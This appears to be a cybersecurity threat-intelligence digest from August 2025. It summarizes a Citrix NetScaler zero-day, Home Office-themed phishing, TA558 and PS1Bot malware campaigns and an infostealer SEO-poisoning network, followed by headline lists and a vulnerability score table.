Skip to main content Skip to footer 
Citrix NetScaler flaw exploited as zero-day in attacks against Netherlands-based organizations
The Dutch National Cyber Security Centre (NCSC) has warned that since at least early May 2025, a Citrix NetScaler vulnerability, tracked as CVE-2025-6543, has been exploited as a zero-day to breach ‘critical organizations’ within the country. While the flaw was initially thought to be exploited in a series of denial-of-service attacks, the NCSC now indicates that the attackers exploited the flaw to achieve remote code execution. The attacks were initiated by one or more sophisticated actors, who actively removed all traces of activity after compromise to eliminate evidence of the intrusion. Although impacted organizations have not been named, the Openbaar Ministerie disclosed a breach on July 18th, 2025, stating that the attack was discovered after receiving a NCSC alert. The attack caused severe operational disruption, with the organization only starting to turn some of its systems back online around August 4th, 2025. Patches for the flaw are available.
UK Home Office impersonated in phishing campaign targeting visa sponsor license holders
Mimecast researchers discovered an ongoing phishing campaign targeting UK organizations holding sponsor licenses, with a specific focus on those actively managing visa sponsorship programs and using the Sponsorship Management System (SMS). The aim of the campaign is to steal SMS portal login credentials, enabling financial exploitation, fraudulent immigration activity, and identity theft. The attackers send emails impersonating the UK Home Office that cite urgent compliance or suspension warnings. The emails contain a link to a CAPTCHA-gated URL, which redirects users to a phishing page cloned from the official SMS portal, with the entered credentials then granting full sponsor functionality. Compromised accounts are typically sold on dark web forums for financial gain or used directly for immigration fraud, while some accounts may also be used for extortion against the targeted organization.
TA558-linked campaign uses steganography to deliver PureLogs and Remcos malware
Between July and August 2025, ShadowOpCode researchers observed a malspam campaign targeting Italian-speaking individuals. The campaign used invoice-themed phishing emails containing an XLS document designed to exploit CVE-2017-11882, which initiated a multi-stage dropper execution chain. The campaign also used BMP-in-JPG steganography to conceal the .NET payloads, which ultimately led to the execution of Remcos or PureLogs malware stored in a DLL file. Based on Italian and French variable names in the loader and Portuguese terms inside a DLL, the campaign aligns with patterns previously linked to TA558’s SteganoAmor campaign. The researchers assess with moderate-high confidence that the overlaps in techniques, language choices, and staging logic strongly suggests TA558 or an actor using the same toolset is behind the campaign. The campaign’s infrastructure, including the use of DuckDNS, ngrok, and more, also aligns with previously reported TA558 clusters.
Pakistan-based network leverages SEO poisoning to distribute infostealers
CloudSEK researchers uncovered a Pakistan-based infostealer distribution network leveraging search engine optimization (SEO) poisoning and abusing legitimate online forums and platforms to financially benefit from pay-per-install (PPI) schemes. The network, which has operated since 2020, creates posts for high-demand cracked software to lure victims to a series of malicious WordPress sites that deliver infostealer malware, notably Lumma Stealer, Meta Stealer, and Atomic macOS Stealer, via password-protected archives. The threat actors manage their own PPI networks, using SpaxMedia and InstallBank to pay themselves and their affiliates after successful malware installations. To date, a total of 5,239 network affiliates have operated 3,883 sites to generate over 449 million clicks and over 1.88 million installations of infostealers within the documented period. The course of the campaign has acquired over $4.67 million in revenue.
PS1Bot leverages PowerShell commands for keylogging, data theft, persistence, and more
Throughout 2025, Cisco Talos researchers observed an ongoing campaign leveraging malvertising to infect victims with a multi-stage malware framework, dubbed PS1Bot, that is implemented in PowerShell and C#. PS1Bot features a modular design, delivering several modules to perform keylogging, information theft, and reconnaissance, and establish persistence. Its modules are delivered in-memory to evade detection. The malware is spread via a compressed archive containing a JavaScript file that acts as a downloader. Once executed, the script performs the required environment setup, including writing a PowerShell script that attempts to establish a C2 connection. Any further received content is passed to Invoke-Expression and executed within the PowerShell process, enabling credential, session token, and financial data theft. The campaign has been highly active, with new samples continuously observed over the past months. PS1Bot features similarities to the design and implementation of the AHK Bot malware family. Activity associated with the campaign also displays overlaps with previous reporting on Skitnet.
Ransomware
Crypto24 Ransomware Group Blends Legitimate Tools with Custom Malware for Stealth AttacksTrend Micro Research News Perspectives – Aug 14 2025Croatian research institute confirms ransomware attack via ToolShell vulnerabilitiesHelp Net Security – Aug 13 2025US Authorities Seize $1m from BlackSuit Ransomware GroupInfosecurity Today – Aug 13 2025New Ransomware Charon Uses Earth Baxia APT Techniques to Target EnterprisesTrend Micro Research News Perspectives – Aug 12 2025Researchers cracked the encryption used by DarkBit ransomwareSecurity Affairs – Aug 12 2025MedusaLocker ransomware group is looking for pentestersSecurity Affairs – Aug 11 2025Unmasking Embargo Ransomware: A Deep Dive Into the Group’s TTPs and BlackCat LinksTRM Labs – Aug 08 2025
Financial Services
Fictitious Law Firms Targeting Cryptocurrency Scam Victims Combine Multiple Exploitation Tactics While Offering to Recover FundsInternet Crime Complaint Center – Aug 13 2025Hackers leak Allianz Life data stolen in Salesforce attacksBleeping Computer – Aug 12 2025Scammers mass-mailing the Efimer Trojan to steal cryptoKaspersky Lab – Aug 08 2025GreedyBear Steals $1M in Crypto Using 150+ Malicious Firefox Wallet ExtensionsThe Hacker News – Aug 08 2025GitLab uncovers Bittensor theft campaign via PyPIGitLab – Blog – Aug 06 2025
Geopolitics
‘Curly COMrades’ APT Hackers Target Critical Organizations Across Multiple CountriesGBHackers On Security – Aug 13 2025Hacker Alleges Russian Government Role in Kaseya Cyber-AttackInfosecurity Today – Aug 12 2025Researchers detail new ‘gray zone conflict’ in AI-driven Chinese propagandaNextgov – All Content – Aug 11 2025From ClickFix to Command: A Full PowerShell Attack Chain Fortinet – Aug 11 2025‘A million calls an hour’: Israel relying on Microsoft cloud for expansive surveillance of PalestiniansThe Guardian – Aug 06 2025
High Priority Vulnerabilities
| Name | Software | Base Score | Temp Score | |
|---|---|---|---|---|
| CVE-2025-8088 | WinRAR | 8.8 | 6.3 | |
| Related: WinRAR flaw exploited as zero-day by RomCom group and Paper Werewolf | ||||
| CVE-2025-53786 | Exchange Server | 8.0 | 6.3 | |
| Related: CISA issues emergency directive for Microsoft Exchange flaw | ||||
| CVE-2025-53779 | Windows | 7.2 | 6.7 | |
| Related: Microsoft August 2025 Patch Tuesday fixes one zero-day, 107 flaws | ||||
| CVE-2025-32433 | OTP | 10.0 | 9.4 | |
| Related: Maximum-severity Erlang/OTP flaw exploited to deliver malicious payloads | ||||
| CVE-2024-40766 | SonicOS | 9.8 | 7.0 | |
| Related: SonicWall confirms SSL VPN exploitation not connected to zero-day flaw | ||||